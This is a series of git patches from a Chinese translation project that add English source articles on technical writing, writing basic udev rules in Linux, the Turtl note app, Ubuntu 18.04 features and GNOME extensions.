+"completely new" → "new" + +As you might have guessed by now, writing is rewriting. Good writing requires effort and practice. But even if you write only occasionally, you can significantly improve your texts by focusing on the target audience and by using basic writing techniques. The better the readability of a text, the easier it is to process, even for an audience with varying language skills. When it comes to localization especially, good quality of the source text is important: Garbage in, garbage out. If the original text has deficiencies, it will take longer to translate the text, resulting in higher costs. In the worst case, the flaws will be multiplied during translation and need to be corrected in various languages.  + + +![Tanja Roth](https://www.linux.com/sites/lcom/files/styles/floated_images/public/tanja-roth.jpg?itok=eta0fvZC "Tanja Roth") + +Tanja Roth, Technical Documentation Specialist at SUSE Linux GmbH[Used with permission][1] + + _Driven by an interest in both language and technology, Tanja has been working as a technical writer in mechanical engineering, medical technology, and IT for many years. She joined SUSE in 2005 and contributes to a wide range of product and project documentation, including High Availability and Cloud topics._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/event/open-source-summit-eu/2017/12/technical-writing-international-audience?sf175396579=1 + +作者:[TANJA ROTH ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/tanja-roth +[1]:https://www.linux.com/licenses/category/used-permission +[2]:https://www.linux.com/licenses/category/creative-commons-zero +[3]:https://www.linux.com/files/images/tanja-rothjpg +[4]:https://www.linux.com/files/images/typewriter-8019211920jpg +[5]:https://osseu17.sched.com/event/ByIW +[6]:https://en.wikipedia.org/wiki/Persona_(user_experience) From c0744035ef455570db822cf62f6abe752a8cdb96 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:17:23 +0800 Subject: [PATCH 0437/1627] =?UTF-8?q?20171209-5=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... how to write basic udev rules in Linux.md | 210 ++++++++++++++++++ 1 file changed, 210 insertions(+) create mode 100644 sources/tech/20171204 Tutorial on how to write basic udev rules in Linux.md diff --git a/sources/tech/20171204 Tutorial on how to write basic udev rules in Linux.md b/sources/tech/20171204 Tutorial on how to write basic udev rules in Linux.md new file mode 100644 index 0000000000..e4f3d6f537 --- /dev/null +++ b/sources/tech/20171204 Tutorial on how to write basic udev rules in Linux.md @@ -0,0 +1,210 @@ +# Tutorial on how to write basic udev rules in Linux + +Contents + +* * [1. Objective][4] + + * [2. Requirements][5] + + * [3. Difficulty][6] + + * [4. Conventions][7] + + * [5. Introduction][8] + + * [6. How rules are organized][9] + + * [7. The rules syntax][10] + + * [8. A test case][11] + + * [9. Operators][12] + * * [9.1.1. == and != operators][1] + + * [9.1.2. The assignment operators: = and :=][2] + + * [9.1.3. The += and -= operators][3] + + * [10. The keys we used][13] + +### Objective + +Understanding the base concepts behind udev, and learn how to write simple rules + +### Requirements + +* Root permissions + +### Difficulty + +MEDIUM + +### Conventions + +* **#** - requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command + +* **$** - given command to be executed as a regular non-privileged user + +### Introduction + +In a GNU/Linux system, while devices low level support is handled at the kernel level, the management of events related to them is managed in userspace by `udev`, and more precisely by the `udevd` daemon. Learning how to write rules to be applied on the occurring of those events can be really useful to modify the behavior of the system and adapt it to our needs. + +### How rules are organized + +Udev rules are defined into files with the `.rules` extension. There are two main locations in which those files can be placed: `/usr/lib/udev/rules.d` it's the directory used for system-installed rules, `/etc/udev/rules.d/`is reserved for custom made rules.  + +The files in which the rules are defined are conventionally named with a number as prefix (e.g `50-udev-default.rules`) and are processed in lexical order independently of the directory they are in. Files installed in `/etc/udev/rules.d`, however, override those with the same name installed in the system default path. + +### The rules syntax + +The syntax of udev rules is not very complicated once you understand the logic behind it. A rule is composed by two main sections: the "match" part, in which we define the conditions for the rule to be applied, using a series of keys separated by a comma, and the "action" part, in which we perform some kind of action, when the conditions are met.  + +### A test case + +What a better way to explain possible options than to configure an actual rule? As an example, we are going to define a rule to disable the touchpad when a mouse is connected. Obviously the attributes provided in the rule definition, will reflect my hardware.  + +We will write our rule in the `/etc/udev/rules.d/99-togglemouse.rules` file with the help of our favorite text editor. A rule definition can span over multiple lines, but if that's the case, a backslash must be used before the newline character, as a line continuation, just as in shell scripts. Here is our rule: +``` +ACTION=="add" \ +, ATTRS{idProduct}=="c52f" \ +, ATTRS{idVendor}=="046d" \ +, ENV{DISPLAY}=":0" \ +, ENV{XAUTHORITY}="/run/user/1000/gdm/Xauthority" \ +, RUN+="/usr/bin/xinput --disable 16" +``` +Let's analyze it. + +### Operators + +First of all, an explanation of the used and possible operators: + +#### == and != operators + +The `==` is the equality operator and the `!=` is the inequality operator. By using them we establish that for the rule to be applied the defined keys must match, or not match the defined value respectively. + +#### The assignment operators: = and := + +The `=` assignment operator, is used to assign a value to the keys that accepts one. We use the `:=` operator, instead, when we want to assign a value and we want to make sure that it is not overridden by other rules: the values assigned with this operator, in facts, cannot be altered. + +#### The += and -= operators + +The `+=` and `-=` operators are used respectively to add or to remove a value from the list of values defined for a specific key. + +### The keys we used + +Let's now analyze the keys we used in the rule. First of all we have the `ACTION` key: by using it, we specified that our rule is to be applied when a specific event happens for the device. Valid values are `add`, `remove` and `change`  + +We then used the `ATTRS` keyword to specify an attribute to be matched. We can list a device attributes by using the `udevadm info` command, providing its name or `sysfs` path: +``` +udevadm info -ap /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.1/0003:046D:C52F.0010/input/input39 + +Udevadm info starts with the device specified by the devpath and then +walks up the chain of parent devices. It prints for every device +found, all possible attributes in the udev rules key format. +A rule to match, can be composed by the attributes of the device +and the attributes from one single parent device. + + looking at device '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.1/0003:046D:C52F.0010/input/input39': + KERNEL=="input39" + SUBSYSTEM=="input" + DRIVER=="" + ATTR{name}=="Logitech USB Receiver" + ATTR{phys}=="usb-0000:00:1d.0-1.2/input1" + ATTR{properties}=="0" + ATTR{uniq}=="" + + looking at parent device '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.1/0003:046D:C52F.0010': + KERNELS=="0003:046D:C52F.0010" + SUBSYSTEMS=="hid" + DRIVERS=="hid-generic" + ATTRS{country}=="00" + + looking at parent device '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.1': + KERNELS=="2-1.2:1.1" + SUBSYSTEMS=="usb" + DRIVERS=="usbhid" + ATTRS{authorized}=="1" + ATTRS{bAlternateSetting}==" 0" + ATTRS{bInterfaceClass}=="03" + ATTRS{bInterfaceNumber}=="01" + ATTRS{bInterfaceProtocol}=="00" + ATTRS{bInterfaceSubClass}=="00" + ATTRS{bNumEndpoints}=="01" + ATTRS{supports_autosuspend}=="1" + + looking at parent device '/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2': + KERNELS=="2-1.2" + SUBSYSTEMS=="usb" + DRIVERS=="usb" + ATTRS{authorized}=="1" + ATTRS{avoid_reset_quirk}=="0" + ATTRS{bConfigurationValue}=="1" + ATTRS{bDeviceClass}=="00" + ATTRS{bDeviceProtocol}=="00" + ATTRS{bDeviceSubClass}=="00" + ATTRS{bMaxPacketSize0}=="8" + ATTRS{bMaxPower}=="98mA" + ATTRS{bNumConfigurations}=="1" + ATTRS{bNumInterfaces}==" 2" + ATTRS{bcdDevice}=="3000" + ATTRS{bmAttributes}=="a0" + ATTRS{busnum}=="2" + ATTRS{configuration}=="RQR30.00_B0009" + ATTRS{devnum}=="12" + ATTRS{devpath}=="1.2" + ATTRS{idProduct}=="c52f" + ATTRS{idVendor}=="046d" + ATTRS{ltm_capable}=="no" + ATTRS{manufacturer}=="Logitech" + ATTRS{maxchild}=="0" + ATTRS{product}=="USB Receiver" + ATTRS{quirks}=="0x0" + ATTRS{removable}=="removable" + ATTRS{speed}=="12" + ATTRS{urbnum}=="1401" + ATTRS{version}==" 2.00" + + [...] +``` +Above is the truncated output received after running the command. As you can read it from the output itself, `udevadm` starts with the specified path that we provided, and gives us information about all the parent devices. Notice that attributes of the device are reported in singular form (e.g `KERNEL`), while the parent ones in plural form (e.g `KERNELS`). The parent information can be part of a rule but only one of the parents can be referenced at a time: mixing attributes of different parent devices will not work. In the rule we defined above, we used the attributes of one parent device: `idProduct` and `idVendor`.  + +The next thing we have done in our rule, is to use the `ENV` keyword: it can be used to both set or try to match environment variables. We assigned a value to the `DISPLAY` and `XAUTHORITY` ones. Those variables are essential when interacting with the X server programmatically, to setup some needed information: with the `DISPLAY` variable, we specify on what machine the server is running, what display and what screen we are referencing, and with `XAUTHORITY` we provide the path to the file which contains Xorg authentication and authorization information. This file is usually located in the users "home" directory.  + +Finally we used the `RUN` keyword: this is used to run external programs. Very important: this is not executed immediately, but the various actions are executed once all the rules have been parsed. In this case we used the `xinput` utility to change the status of the touchpad. I will not explain the syntax of xinput here, it would be out of context, just notice that `16` is the id of the touchpad.  + +Once our rule is set, we can debug it by using the `udevadm test` command. This is useful for debugging but it doesn't really run commands specified using the `RUN` key: +``` +$ udevadm test --action="add" /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.1/0003:046D:C52F.0010/input/input39 +``` +What we provided to the command is the action to simulate, using the `--action` option, and the sysfs path of the device. If no errors are reported, our rule should be good to go. To run it in the real world, we must reload the rules: +``` +# udevadm control --reload +``` +This command will reload the rules files, however, will have effect only on new generated events.  + +We have seen the basic concepts and logic used to create an udev rule, however we only scratched the surface of the many options and possible settings. The udev manpage provides an exhaustive list: please refer to it for a more in-depth knowledge. + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux + +作者:[Egidio Docile ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://disqus.com/by/egidiodocile/ +[1]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h9-1-1-and-operators +[2]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h9-1-2-the-assignment-operators-and +[3]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h9-1-3-the-and-operators +[4]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h1-objective +[5]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h2-requirements +[6]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h3-difficulty +[7]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h4-conventions +[8]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h5-introduction +[9]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h6-how-rules-are-organized +[10]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h7-the-rules-syntax +[11]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h8-a-test-case +[12]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h9-operators +[13]:https://linuxconfig.org/tutorial-on-how-to-write-basic-udev-rules-in-linux#h10-the-keys-we-used From 1ba414f29fcb49ea5648753deb1a83c16f2fbeb7 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:20:36 +0800 Subject: [PATCH 0438/1627] =?UTF-8?q?20171209-6=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... an open source alternative to Evernote.md | 115 ++++++++++++++++++ 1 file changed, 115 insertions(+) create mode 100644 sources/tech/20171206 Getting started with Turtl an open source alternative to Evernote.md diff --git a/sources/tech/20171206 Getting started with Turtl an open source alternative to Evernote.md b/sources/tech/20171206 Getting started with Turtl an open source alternative to Evernote.md new file mode 100644 index 0000000000..18d7d12f82 --- /dev/null +++ b/sources/tech/20171206 Getting started with Turtl an open source alternative to Evernote.md @@ -0,0 +1,115 @@ +Getting started with Turtl, an open source alternative to Evernote +============================================================ + +### Turtl is a solid note-taking tool for users looking for an alternative to apps like Evernote and Google Keep. + +![Using Turtl as an open source alternative to Evernote](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUS_brainstorm_island_520px.png?itok=6IUPyxkY "Using Turtl as an open source alternative to Evernote") +Image by : opensource.com + +Just about everyone I know takes notes, and many people use an online note-taking application like Evernote, Simplenote, or Google Keep. Those are all good tools, but you have to wonder about the security and privacy of your information—especially in light of [Evernote's privacy flip-flop of 2016][11]. If you want more control over your notes and your data, you really need to turn to an open source tool. + +Whatever your reasons for moving away from Evernote, there are open source alternatives out there. Let's look at one of those alternatives: Turtl. + +### Getting started + +The developers behind [Turtl][12] want you to think of it as "Evernote with ultimate privacy." To be honest, I can't vouch for the level of privacy that Turtl offers, but it is a quite a good note-taking tool. + +To get started with Turtl, [download][13] a desktop client for Linux, Mac OS, or Windows, or grab the [Android app][14]. Install it, then fire up the client or app. You'll be asked for a username and passphrase. Turtl uses the passphrase to generate a cryptographic key that, according to the developers, encrypts your notes before storing them anywhere on your device or on their servers. + +### Using Turtl + +You can create the following types of notes with Turtl: + +* Password + +* File + +* Image + +* Bookmark + +* Text note + +No matter what type of note you choose, you create it in a window that's similar for all types of notes: + + +![Create new text note with Turtl](https://opensource.com/sites/default/files/images/life-uploads/turtl-new-note-520.png "Creating a new text note with Turtl") + +Creating a new text note in Turtl + +Add information like the title of the note, some text, and (if you're creating a File or Image note) attach a file or an image. Then click **Save**. + +You can add formatting to your notes via [Markdown][15]. You need to add the formatting by hand—there are no toolbar shortcuts. + +If you need to organize your notes, you can add them to **Boards**. Boards are just like notebooks in Evernote. To create a new board, click on the **Boards** tab, then click the **Create a board** button. Type a title for the board, then click **Create**. + + +![Create new board in Turtl](https://opensource.com/sites/default/files/images/life-uploads/turtl-boards-520.png "Creating a new Turtl board") + +Creating a new board in Turtl + +To add a note to a board, create or edit the note, then click the **This note is not in any boards** link at the bottom of the note. Select one or more boards, then click **Done**. + +To add tags to a note, click the **Tags** icon at the bottom of a note, enter one or more keywords separated by commas, and click **Done**. + +### Syncing your notes across your devices + +If you use Turtl across several computers and an Android device, for example, Turtl will sync your notes whenever you're online. However, I've encountered a small problem with syncing: Every so often, a note I've created on my phone doesn't sync to my laptop. I tried to sync manually by clicking the icon in the top left of the window and then clicking **Sync Now**, but that doesn't always work. I found that I occasionally need to click that icon, click **Your settings**, and then click **Clear local data**. I then need to log back into Turtl, but all the data syncs properly. + +### A question, and a couple of problems + +When I started using Turtl, I was dogged by one question:  _Where are my notes kept online?_  It turns out that the developers behind Turtl are based in the U.S., and that's also where their servers are. Although the encryption that Turtl uses is [quite strong][16] and your notes are encrypted on the server, the paranoid part of me says that you shouldn't save anything sensitive in Turtl (or any online note-taking tool, for that matter). + +Turtl displays notes in a tiled view, reminiscent of Google Keep: + + +![Notes in Turtl](https://opensource.com/sites/default/files/images/life-uploads/turtl-notes-520.png "Collection of notes in Turtl") + +A collection of notes in Turtl + +There's no way to change that to a list view, either on the desktop or on the Android app. This isn't a problem for me, but I've heard some people pan Turtl because it lacks a list view. + +Speaking of the Android app, it's not bad; however, it doesn't integrate with the Android **Share** menu. If you want to add a note to Turtl based on something you've seen or read in another app, you need to copy and paste it manually. + +I've been using a Turtl for several months on a Linux-powered laptop, my [Chromebook running GalliumOS][17], and an Android-powered phone. It's been a pretty seamless experience across all those devices. Although it's not my favorite open source note-taking tool, Turtl does a pretty good job. Give it a try; it might be the simple note-taking tool you're looking for. + + +### About the author + + [![That idiot Scott Nesbitt ...](https://opensource.com/sites/default/files/styles/profile_pictures/public/scottn-cropped.jpg?itok=q4T2J4Ai)][18] + + Scott Nesbitt - I'm a long-time user of free/open source software, and write various things for both fun and profit. I don't take myself too seriously and I do all of my own stunts. You can find me at these fine establishments on the web: [Twitter][5], [Mastodon][6], [GitHub][7], and... [more about Scott Nesbitt][8][More about me][9] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/using-turtl-open-source-alternative-evernote + +作者:[Scott Nesbitt ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/scottnesbitt +[1]:https://opensource.com/file/378346 +[2]:https://opensource.com/file/378351 +[3]:https://opensource.com/file/378356 +[4]:https://opensource.com/article/17/12/using-turtl-open-source-alternative-evernote?rate=Kktl8DSEAXzwIGppn0PS4KuSpZv3Qbk0fuiilnplrnE +[5]:http://www.twitter.com/ScottWNesbitt +[6]:https://mastodon.social/@scottnesbitt +[7]:https://github.com/ScottWNesbitt +[8]:https://opensource.com/users/scottnesbitt +[9]:https://opensource.com/users/scottnesbitt +[10]:https://opensource.com/user/14925/feed +[11]:https://blog.evernote.com/blog/2016/12/15/evernote-revisits-privacy-policy/ +[12]:https://turtlapp.com/ +[13]:https://turtlapp.com/download/ +[14]:https://turtlapp.com/download/ +[15]:https://en.wikipedia.org/wiki/Markdown +[16]:https://turtlapp.com/docs/security/encryption-specifics/ +[17]:https://opensource.com/article/17/4/linux-chromebook-gallium-os +[18]:https://opensource.com/users/scottnesbitt +[19]:https://opensource.com/users/scottnesbitt +[20]:https://opensource.com/users/scottnesbitt +[21]:https://opensource.com/article/17/12/using-turtl-open-source-alternative-evernote#comments +[22]:https://opensource.com/tags/alternatives From 0a69496990fe3751c26a2471eca6d477b12c13e6 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:27:47 +0800 Subject: [PATCH 0439/1627] =?UTF-8?q?20171209-7=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20171205 Ubuntu 18.04 – New Features.md | 154 ++++++++++++++++++ 1 file changed, 154 insertions(+) create mode 100644 sources/tech/20171205 Ubuntu 18.04 – New Features.md diff --git a/sources/tech/20171205 Ubuntu 18.04 – New Features.md b/sources/tech/20171205 Ubuntu 18.04 – New Features.md new file mode 100644 index 0000000000..79fa22e1f6 --- /dev/null +++ b/sources/tech/20171205 Ubuntu 18.04 – New Features.md @@ -0,0 +1,154 @@ +Ubuntu 18.04 – New Features, Release Date & More +============================================================ + + +We’ve all been waiting for it – the new LTS release of Ubuntu – 18.04\. Learn more about new features, the release dates, and more. + +> Note: we’ll frequently update this article with new information, so bookmark this page and check back soon. + +### Basic information about Ubuntu 18.04 + +Let’s start with some basic information. + +* It’s a new LTS (Long Term Support) release. So you get 5 years of support for both the desktop and server version. + +* Named “Bionic Beaver”. The founder of Canonical, Mark Shuttleworth, explained the meaning behind the name. The mascot is a Beaver because it’s energetic, industrious, and an awesome engineer – which perfectly describes a typical Ubuntu user, and the new Ubuntu release itself. The “Bionic” adjective is due to the increased number of robots that run on the Ubuntu Core. + +### Ubuntu 18.04 Release Dates & Schedule + +If you’re new to Ubuntu, you may not be familiar the actual version numbers mean. It’s the year and month of the official release. So Ubuntu’s 18.04 official release will be in the 4th month of the year 2018. Ubuntu 17.10 was released in 2017, in the 10th month of the year. + +To go into further details, here are the important dates and need to know about Ubuntu 18.04 LTS: + +* November 30th, 2017 – Feature Definition Freeze. + +* January 4th, 2018 – First Alpha release. So if you opted-in to receive new Alpha releases, you’ll get the Alpha 1 update on this date. + +* February 1st, 2018 – Second Alpha release. + +* March 1st, 2018 – Feature Freeze. No new features will be introduced or released. So the development team will only work on improving existing features and fixing bugs. With exceptions, of course. If you’re not a developer or an experienced user, but would still like to try the new Ubuntu ASAP, then I’d personally recommend starting with this release. + +* March 8th, 2018 – First Beta release. If you opted-in for receiving Beta updates, you’ll get your update on this day. + +* March 22nd, 2018 – User Interface Freeze. It means that no further changes or updates will be done to the actual user interface, so if you write documentation, [tutorials][1], and use screenshots, it’s safe to start then. + +* March 29th, 2018 – Documentation String Freeze. There won’t be any edits or new stuff (strings) added to the documentation, so translators can start translating the documentation. + +* April 5th, 2018 – Final Beta release. This is also a good day to start using the new release. + +* April 19th, 2018 – Final Freeze. Everything’s pretty much done now. Images for the release are created and distributed, and will likely not have any changes. + +* April 26th, 2018 – Official, Final release of Ubuntu 18.04\. Everyone should start using it starting this day, even on production servers. We recommend getting an Ubuntu 18.04 server from [Vultr][2] and testing out the new features. Servers at [Vultr][3] start at $2.5 per month. + +### What’s New in Ubuntu 18.04 + +All the new features in Ubuntu 18.04 LTS: + +### Color emojis are now supported  + +With previous versions, Ubuntu only supported monochrome (black and white) emojis, which quite frankly, didn’t look so good. Ubuntu 18.04 will support colored emojis by using the [Noto Color Emoji font][7]. With 18.04, you can view and add color emojis with ease everywhere. They are supported natively – so you can use them without using 3-rd party apps or installing/configuring anything extra. You can always disable the color emojis by removing the font. + +### GNOME desktop environment + + [![ubuntu 17.10 gnome](https://thishosting.rocks/wp-content/uploads/2017/12/ubuntu-17-10-gnome.jpg.webp)][8] + +Ubuntu started using the GNOME desktop environment with Ubuntu 17.10 instead of the default Unity environment. Ubuntu 18.04 will continue using GNOME. This is a major change to Ubuntu. + +### Ubuntu 18.04 Desktop will have a new default theme + +Ubuntu 18.04 is saying Goodbye to the old ‘Ambience’ default theme with a new GTK theme. If you want to help with the new theme, check out some screenshots and more, go [here][9]. + +As of now, there is speculation that Suru will be the [new default icon theme][10] for Ubuntu 18.04\. Here’s a screenshot: + + [![suru icon theme ubuntu 18.04](https://thishosting.rocks/wp-content/uploads/2017/12/suru-icon-theme-ubuntu-18-04.jpg.webp)][11] + +> Worth noting: all new features in Ubuntu 16.10, 17.04, and 17.10 will roll through to Ubuntu 18.04\. So updates like Window buttons to the right, a better login screen, imrpoved Bluetooth support etc. will roll out to Ubuntu 18.04\. We won’t include a special section since it’s not really new to Ubuntu 18.04 itself. If you want to learn more about all the changes from 16.04 to 18.04, google it for each version in between. + +### Download Ubuntu 18.04 + +First off, if you’re already using Ubuntu, you can just upgrade to Ubuntu 18.04. + +If you need to download Ubuntu 18.04: + +Go to the [official Ubuntu download page][12] after the final release. + +For the daily builds (alpha, beta, and non-final releases), go [here][13]. + +### FAQs + +Now for some of the frequently asked questions (with answers) that should give you more information about all of this. + +### When is it safe to switch to Ubuntu 18.04? + +On the official final release date, of course. But if you can’t wait, start using the desktop version on March 1st, 2018, and start testing out the server version on April 5th, 2018\. But for you to truly be “safe”, you’ll need to wait for the final release, maybe even more so the 3-rd party services and apps you are using are tested and working well on the new release. + +### How do I upgrade my server to Ubuntu 18.04? + +It’s a fairly simple process but has huge potential risks. We may publish a tutorial sometime in the near future, but you’ll basically need to use ‘do-release-upgrade’. Again, upgrading your server has potential risks, and if you’re on a production server, I’d think twice before upgrading. Especially if you’re on 16.04 which has a few years of support left. + +### How can I help with Ubuntu 18.04? + +Even if you’re not an experienced developer and Ubuntu user, you can still help by: + +* Spreading the word. Let people know about Ubuntu 18.04\. A simple share on social media helps a bit too. + +* Using and testing the release. Start using the release and test it. Again, you don’t have to be a developer. You can still find and report bugs, or send feedback. + +* Translating. Join the translating teams and start translating documentation and/or applications. + +* Helping other people. Join some online Ubuntu communities and help others with issues they’re having with Ubuntu 18.04\. Sometimes people need help with simple stuff like “where can I download Ubuntu?” + +### What does Ubuntu 18.04 mean for other distros like Lubuntu? + +All distros that are based on Ubuntu will have similar new features and a similar release schedule. You’ll need to check your distro’s official website for more information. + +### Is Ubuntu 18.04 an LTS release? + +Yes, Ubuntu 18.04 is an LTS (Long Term Support) release, so you’ll get support for 5 years. + +### Can I switch from Windows/OS X to Ubuntu 18.04? + +Of course! You’ll most likely experience a performance boost too. Switching from a different OS to Ubuntu is fairly easy, there are quite a lot of tutorials for doing that. You can even set up a dual-boot where you’ll be using multiple OSes, so you can use both Windows and Ubuntu 18.04. + +### Can I try Ubuntu 18.04 without installing it? + +Sure. You can use something like [VirtualBox][14] to create a “virtual desktop” – you can install it on your local machine and use Ubuntu 18.04 without actually installing Ubuntu. + +Or you can try an Ubuntu 18.04 server at [Vultr][15] for $2.5 per month. It’s essentially free if you use some [free credits][16]. + +### Why can’t I find a 32-bit version of Ubuntu 18.04? + +Because there is no 32bit version. Ubuntu dropped 32bit versions with its 17.10 release. If you’re using old hardware, you’re better off using a different [lightweight Linux distro][17] instead of Ubuntu 18.04 anyway. + +### Any other question? + +Leave a comment below! Share your thoughts, we’re super excited and we’re gonna update this article as soon as new information comes in. Stay tuned and be patient! + +-------------------------------------------------------------------------------- + +via: https://thishosting.rocks/ubuntu-18-04-new-features-release-date/ + +作者:[ thishosting.rocks][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:thishosting.rocks +[1]:https://thishosting.rocks/category/knowledgebase/ +[2]:https://thishosting.rocks/go/vultr/ +[3]:https://thishosting.rocks/go/vultr/ +[4]:https://thishosting.rocks/category/knowledgebase/ +[5]:https://thishosting.rocks/tag/ubuntu/ +[6]:https://thishosting.rocks/2017/12/05/ +[7]:https://www.google.com/get/noto/help/emoji/ +[8]:https://thishosting.rocks/wp-content/uploads/2017/12/ubuntu-17-10-gnome.jpg +[9]:https://community.ubuntu.com/t/call-for-participation-an-ubuntu-default-theme-lead-by-the-community/1545 +[10]:http://www.omgubuntu.co.uk/2017/11/suru-default-icon-theme-ubuntu-18-04-lts +[11]:https://thishosting.rocks/wp-content/uploads/2017/12/suru-icon-theme-ubuntu-18-04.jpg +[12]:https://www.ubuntu.com/download +[13]:http://cdimage.ubuntu.com/daily-live/current/ +[14]:https://www.virtualbox.org/ +[15]:https://thishosting.rocks/go/vultr/ +[16]:https://thishosting.rocks/vultr-coupons-for-2017-free-credits-and-more/ +[17]:https://thishosting.rocks/best-lightweight-linux-distros/ From ba1962dc5886757185ba4907635a7f4058451f50 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:35:22 +0800 Subject: [PATCH 0440/1627] =?UTF-8?q?20171209-9=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...xtensions You Should Be Using Right Now.md | 307 ++++++++++++++++++ 1 file changed, 307 insertions(+) create mode 100644 sources/tech/20171203 Top 20 GNOME Extensions You Should Be Using Right Now.md diff --git a/sources/tech/20171203 Top 20 GNOME Extensions You Should Be Using Right Now.md b/sources/tech/20171203 Top 20 GNOME Extensions You Should Be Using Right Now.md new file mode 100644 index 0000000000..60b188780f --- /dev/null +++ b/sources/tech/20171203 Top 20 GNOME Extensions You Should Be Using Right Now.md @@ -0,0 +1,307 @@ +Top 20 GNOME Extensions You Should Be Using Right Now +============================================================ + + _Brief: You can enhance the capacity of your GNOME desktop with extensions. Here, we list the best GNOME extensions to save you the trouble of finding them on your own._ + +[GNOME extensions][9] are a major part of the [GNOME][10] experience. These extensions add a lot of value to the ecosystem whether it is to mold the Gnome Desktop Environment (DE) to your workflow, to add more functionality than there is by default, or just simply to freshen up the experience. + +With default [Ubuntu 17.10][11] switching from [Unity to Gnome][12], now is the time to familiarize yourself with the various extensions that the GNOME community has to offer. We already showed you[ how to enable and manage GNOME extensions][13]. But finding good extensions could be a daunting task. That’s why I created this list of best GNOME extensions to save you some trouble. + +### Best GNOME Extensions + +![Best GNOME Extensions for Ubuntu](https://itsfoss.com/wp-content/uploads/2017/12/Best-GNOME-Extensions-800x450.jpg) + +The list is in alphabetical order but there is no ranking involved here. Extension at number 1 position is not better than the rest of the extensions. + +### 1\. Appfolders Management extensions + +One of the major features that I think GNOME is missing is the ability to organize the default application grid. This is something included by default in [KDE][14]‘s Application Dashboard, in [Elementary OS][15]‘s Slingshot Launcher, and even in macOS, yet as of [GNOME 3.26][16] it isn’t something that comes baked in. Appfolders Management extension changes that. + +This extension gives the user an easy way to organize their applications into various folders with a simple right click > add to folder. Creating folders and adding applications to them is not only simple through this extension, but it feels so natively implemented that you will wonder why this isn’t built into the default GNOME experience. + +![](https://itsfoss.com/wp-content/uploads/2017/11/folders-300x225.jpg) + +[Appfolders Management extension][17] + +### 2\. Apt Update Indicator + +For distributions that utilize [Apt as their package manager][18], such as Ubuntu or Debian, the Apt Update Indicator extension allows for a more streamlined update experience in GNOME. + +The extension settles into your top bar and notifies the user of updates waiting on their system. It also displays recently added repos, residual config files, files that are auto removable, and allows the user to manually check for updates all in one basic drop-down menu. + +It is a simple extension that adds an immense amount of functionality to any system.  + +![](https://itsfoss.com/wp-content/uploads/2017/11/Apt-Update-300x185.jpg) + +[Apt Update Indicator][19] + +### 3\. Auto Move Windows + +If, like me, you utilize multiple virtual desktops than this extension will make your workflow much easier. Auto Move Windows allows you to set your applications to automatically open on a virtual desktop of your choosing. It is as simple as adding an application to the list and selecting the desktop you would like that application to open on. + +From then on every time you open that application it will open on that desktop. This makes all the difference when as soon as you login to your computer all you have to do is open the application and it immediately opens to where you want it to go without manually having to move it around every time before you can get to work. + +![](https://itsfoss.com/wp-content/uploads/2017/11/auto-move-300x225.jpg) + +[Auto Move Windows][20] + +### 4\. Caffeine  + +Caffeine allows the user to keep their computer screen from auto-suspending at the flip of a switch. The coffee mug shaped extension icon embeds itself into the right side of your top bar and with a click shows that your computer is “caffeinated” with a subtle addition of steam to the mug and a notification. + +The same is true to turn off Caffeine, enabling auto suspend and/or screensave again. It’s incredibly simple to use and works just as you would expect. + 